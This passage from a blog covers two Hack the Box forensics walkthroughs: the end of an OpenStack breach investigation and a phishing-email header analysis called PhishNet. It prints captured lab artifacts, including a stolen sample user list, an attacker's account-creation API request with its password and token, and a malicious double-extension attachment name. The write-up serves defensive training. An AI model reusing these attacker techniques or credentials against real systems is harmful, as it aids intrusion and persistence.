X-Trans-Id: tx89c3d915d2c64b1c8cda1-006863ae33
X-Openstack-Request-Id: tx89c3d915d2c64b1c8cda1-006863ae33
Date: Tue, 01 Jul 2025 09:45:23 GMT
Connection: keep-alive

Task 10 Answer: 2025-07-01 09:45:23

Task 11: How many user records are in the sensitive user data file?
Same request, same stream window I have up from Task 10. You can see the response has this file’s contents and I count 28 records.

Full Name,Email,Phone Number
John Doe,john.doe@example.com,(123) 456-7890
Jane Smith,jane.smith@example.com,(234) 567-8901
Alice Johnson,a.johnson@example.com,(345) 678-9012
Bob Brown,b.brown@example.com,(456) 789-0123
Charlie Davis,c.davis@example.com,(567) 890-1234
Diana Wilson,d.wilson@example.com,(678) 901-2345
Ethan Moore,e.moore@example.com,(789) 012-3456
Fiona Taylor,f.taylor@example.com,(890) 123-4567
George Wilson,g.wilson@example.com,(901) 234-5678
Helen Adams,h.adams@example.com,(012) 345-6789
Ian Lee,i.lee@example.com,(123) 456-7890
Julia Smith,j.smith@example.com,(234) 567-8901
Kevin Miller,k.miller@example.com,(345) 678-9012
Laura Evans,l.evans@example.com,(456) 789-0123
Michael Thomas,m.thomas@example.com,(567) 890-1234
Natalie Wilson,n.wilson@example.com,(678) 901-2345
Oliver Johnson,o.johnson@example.com,(789) 012-3456
Penny Davis,p.davis@example.com,(890) 123-4567
Quinn Lee,q.lee@example.com,(901) 234-5678
Rachel Moore,r.moore@example.com,(012) 345-6789
Simon Evans,s.evans@example.com,(123) 456-7890
Tara Wilson,t.wilson@example.com,(234) 567-8901
Uma Johnson,u.johnson@example.com,(345) 678-9012
Vivian Lee,v.lee@example.com,(456) 789-0123
William Thomas,w.thomas@example.com,(567) 890-1234
Xander Wilson,x.wilson@example.com,(678) 901-2345
Yara Johnson,y.johnson@example.com,(789) 012-3456
Zoe Lee,z.lee@example.com,(890) 123-4567

Task 11 Answer: 28

Task 12: For persistence, the attacker created a new user with admin privileges. What is the username of the new user?
For this one, I went back to the statistics with all of the URLs and made some assumptions. This API seems fairly well-designed in a “discoverable” sense. That means I expect a user will be created by issuing a POST to a URL that has user or users in it. Glancing in my list, I see /identity/v3/users, so I changed my filter to http.request.uri == “/identity/v3/users” to see what we get.

Here we can see a POST and a response of 201-CREATED. That seems promising. If we right click and Follow -> HTTP Stream on the post request, we get this with our user’s name.

POST /identity/v3/users HTTP/1.1
Host: 134.209.71.220
User-Agent: openstacksdk/4.6.0 keystoneauth1/5.11.1 python-requests/2.32.4 CPython/3.13.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Auth-Token: gAAAAABoY67QSl3AarKC9p_FCUhm-zdlkNPcgfqpHncXtnKqPhHgH79XnHa-4IrDf4WlL8QpLiKIQOE8C4kq3Tv21nkTpzMAuGXwLZkEeexqQlLfUtyrhmGjKsFvflRlIEZb0A-1oQZLVzdk1021QkPqjVjFonIEIEBgH0oZll7xE2hp7Scnm2o
Content-Type: application/json
Content-Length: 130

{"user": {"password": "P@$$word", "enabled": true, "default_project_id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "name": "jellibean"}}
HTTP/1.1 201 CREATED
Date: Tue, 01 Jul 2025 09:48:02 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Type: application/json
Content-Length: 312
Vary: X-Auth-Token
x-openstack-request-id: req-70234e40-c6b0-4192-b478-e5cd3732d419
Connection: close

{"user": {"id": "c373da67a62b48f393c45dc071fa80b8", "name": "jellibean", "domain_id": "default", "enabled": true, "default_project_id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "password_expires_at": null, "options": {}, "links": {"self": "http://134.209.71.220/identity/v3/users/c373da67a62b48f393c45dc071fa80b8"}}}

Task 12 Answer: jellibean

Task 13: What is the password of the new user?
Looking at the results in Task 12, we can see the password they set.

Task 13 Answer: P@$$word

Task 14: What is MITRE tactic id of the technique in task 12?
Okay. This isn’t in the files at all and just requires some research. What did Task 12 ask us? It was about creating an account for user persistence (rather than trusting credentials you cracked / uncovered, or leaving a command and control mechanism, etc). Let’s google that. I found out that that is T1136, but the answer wants a sub-technique.

This was a Cloud Account (it wasn’t local to a machine, nor was it on a domain, so this is the most obvious choice), so that makes our answer clear.

Task 14 Answer: T1136.003

And that’s it. This is one of the longest of these that I’ve done. There was a lot of explanations and steps and documentation, but hopefully you all stuck around and I made enough sense to follow along.

Capture the Flag

Hack the Box Walkthrough: PhishNet

This time, we’re taking a look at another Sherlock from Hack the Box called PhishNet. We can probably already guess by the name that this is going to be some Blue Team work around investigating emails or a phishing attack or the like and it turns out that this is a fun little adventure into entry-level email header research. If we take a look at the scenario, we get this: “An accounting team receives an urgent payment request from a known vendor. The email appears legitimate but contains a suspicious link and a .zip attachment hiding malware. Your task is to analyze the email headers, and uncover the attacker’s scheme.”

So there we have it. To start off, we download the .zip file attached to the lab and unzip it using the provided password hacktheblue. Inside, we find one file called email.eml.

Task 1: What is the originating IP address of the sender?

To start off and answer a few of these questions, we can just open the .eml file in plain text viewer of our choice. The answer to this one is right near the top. These headers both agree, so this is definitely the answer.

X-Originating-IP: [45.67.89.10]
...
X-Sender-IP: 45.67.89.10

Task 1 Answer: 45.67.89.10

Task 2: Which mail server relayed this email before reaching the victim?

Looking at the headers again, we see the following. The last server to touch it was mail.business-finance.com. HTB didn’t want that, but the IP instead.

Received: from mail.business-finance.com ([203.0.113.25])
	by mail.target.com (Postfix) with ESMTP id ABC123;
	Mon, 26 Feb 2025 10:15:00 +0000 (UTC)
Received: from relay.business-finance.com ([198.51.100.45])
	by mail.business-finance.com with ESMTP id DEF456;
	Mon, 26 Feb 2025 10:10:00 +0000 (UTC)
Received: from finance@business-finance.com ([198.51.100.75])
	by relay.business-finance.com with ESMTP id GHI789;
	Mon, 26 Feb 2025 10:05:00 +0000 (UTC)

Task 2 Answer: 203.0.113.25

Task 3: What is the sender’s email address?

I wasn’t sure if this was a trick or not, but nothing here appears too crazy and these items all agree, so this is definitely the answer.

Return-Path: <finance@business-finance.com>
...
X-Envelope-From: finance@business-finance.com
...
From: "Finance Dept" <finance@business-finance.com>

Task 3 Answer: finance@business-finance.com

Task 4: What is the ‘Reply-To’ email address specified in the email?

This is at the top (second line). This might seem shady at first, but it is pretty common for emails to be sent from one mailbox that’s unmonitored and to have replies directed to a monitored box.

Reply-To: <support@business-finance.com>

Task 4 Answer: support@business-finance.com

Task 5: What is the SPF (Sender Policy Framework) result for this email?

Headers again.

Received-SPF: Pass (protection.outlook.com: domain of business-finance.com designates 45.67.89.10 as permitted sender)

Task 5 Answer: Pass

Task 6: What is the domain used in the phishing URL inside the email?

Reading the email, we find a link coded as follows:

<a href="https://secure.business-finance.com/invoice/details/view/INV2025-0987/payment">Download Invoice</a>

Task 6 Answer: secure.business-finance.com

Task 7: What is the fake company name used in the email?

Check and see how the rogues signed their email.

<p>Best regards,<br>Finance Department<br>Business Finance Ltd.</p>

Task 7 Answer: Business Finance Ltd.

Task 8: What is the name of the attachment included in the email?

Down at the very bottom, under where it starts --boundary123

Content-Type: application/zip; name="Invoice_2025_Payment.zip"

Content-Disposition: attachment; filename="Invoice_2025_Payment.zip"

Task 8 Answer: Invoice_2025_Payment.zip

Task 9: What is the SHA-256 hash of the attachment?

There are probably a lot of ways to do this. In this case, I’m using ripmime (sudo apt install ripmime)

$ ripmime -i email.eml 
$ ls
email.eml  Invoice_2025_Payment.zip  textfile0  textfile1
$ sha256sum Invoice_2025_Payment.zip 
8379c41239e9af845b2ab6c27a7509ae8804d7d73e455c800a551b22ba25bb4a  Invoice_2025_Payment.zip

Task 9 Answer: 8379c41239e9af845b2ab6c27a7509ae8804d7d73e455c800a551b22ba25bb4a

Task 10: What is the filename of the malicious file contained within the ZIP attachment?

When I try to use unzip to unzip this, I get an error. When I use 7Zip, it yells at me, but extracts a file, giving us the answer.

$ unzip Invoice_2025_Payment.zip 
Archive:  Invoice_2025_Payment.zip
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
unzip:  cannot find zipfile directory in one of Invoice_2025_Payment.zip or
        Invoice_2025_Payment.zip.zip, and cannot find Invoice_2025_Payment.zip.ZIP, period. 

$ 7z x Invoice_2025_Payment.zip 

7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 75 bytes (1 KiB)

Extracting archive: Invoice_2025_Payment.zip

ERRORS:
Unexpected end of archive

--
Path = Invoice_2025_Payment.zip
Type = zip
ERRORS:
Unexpected end of archive
Physical Size = 75
Characteristics = Local

ERROR: Data Error : invoice_document.pdf.bat
                               
Sub items Errors: 1

Archives with Errors: 1

Open Errors: 1

Sub items Errors: 1

Doing a little research, I also apparently could have used exiftool and found the information like this

$ exiftool Invoice_2025_Payment.zip 
ExifTool Version Number         : 13.44
File Name                       : Invoice_2025_Payment.zip
Directory                       : .
File Size                       : 75 bytes
File Modification Date/Time     : 2026:02:11 15:52:58-05:00
File Access Date/Time           : 2026:02:11 15:52:58-05:00
File Inode Change Date/Time     : 2026:02:11 15:52:58-05:00
File Permissions                : -rw-------
Warning                         : Format error reading ZIP file
File Type                       : ZIP
File Type Extension             : zip
MIME Type                       : application/zip
Zip Required Version            : 20
Zip Bit Flag                    : 0
Zip Compression                 : Deflated
Zip Modify Date                 : 2025:02:26 15:56:48
Zip CRC                         : 0x2a8e3d17
Zip Compressed Size             : 1249907
Zip Uncompressed Size           : 1690811
Zip File Name                   : invoice_document.pdf.bat

Task 10 Answer: invoice_document.pdf.bat

Task 11: Which MITRE ATT&CK techniques are associated with this attack?

So this information isn’t located in the file. I also searched our SHA256 on VirusTotal and there were a ton of MITRE ATT&CK techniques associated with the file, so I had to think broader. What kind of attack is this? This is a phishing attack. Specifically, it seems like a targeted phishing attack making it likely spearphishing. However, it doesn’t qualify as whaling because this isn’t a single high-value individual being targeted. When we look up Phishing on the MITRE ATT&CK pages, we see this category and sub-categories.

Given that this was phishing with an attachment, I tried T1566.001 and that is what they wanted.

Task 11 Answer: T1566.001